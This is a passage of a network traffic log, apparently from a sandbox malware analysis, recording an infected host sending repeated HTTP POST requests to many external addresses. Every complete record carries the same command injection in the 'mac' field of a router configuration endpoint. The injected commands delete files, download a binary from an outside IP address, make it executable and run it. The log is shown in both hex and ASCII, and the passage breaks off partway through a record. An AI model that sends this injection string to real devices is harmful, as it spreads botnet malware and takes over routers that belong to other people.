                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1265192.168.2.2358318108.41.56.1888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368602991 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1266192.168.2.2351984104.160.38.1508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368658066 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1267192.168.2.2360286116.251.22.2268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368658066 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1268192.168.2.234960897.72.118.738080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368702888 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1269192.168.2.235276892.186.73.298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368706942 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1270192.168.2.2359668125.43.64.1638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368740082 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1271192.168.2.2353410206.90.253.958080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368767023 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1272192.168.2.236092467.148.105.638080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368781090 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1273192.168.2.233473012.121.132.838080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368802071 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1274192.168.2.235800659.213.87.358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368814945 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1275192.168.2.2354144209.189.161.2438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368829012 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1276192.168.2.234902280.116.61.2208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368859053 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1277192.168.2.2347356210.141.245.1988080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368868113 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1278192.168.2.2342718167.139.6.2198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368891001 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1279192.168.2.2340226135.208.245.1188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368910074 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1280192.168.2.2333720181.9.17.688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368922949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1281192.168.2.2340640154.168.225.1318080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368935108 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1282192.168.2.2337282115.83.194.18080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368954897 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1283192.168.2.2338364191.73.58.498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.368995905 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1284192.168.2.2347366165.233.148.1588080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369031906 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1285192.168.2.2344314183.202.218.2308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369034052 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1286192.168.2.234213820.86.131.1748080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369050980 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1287192.168.2.2347222212.37.87.2238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369055986 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
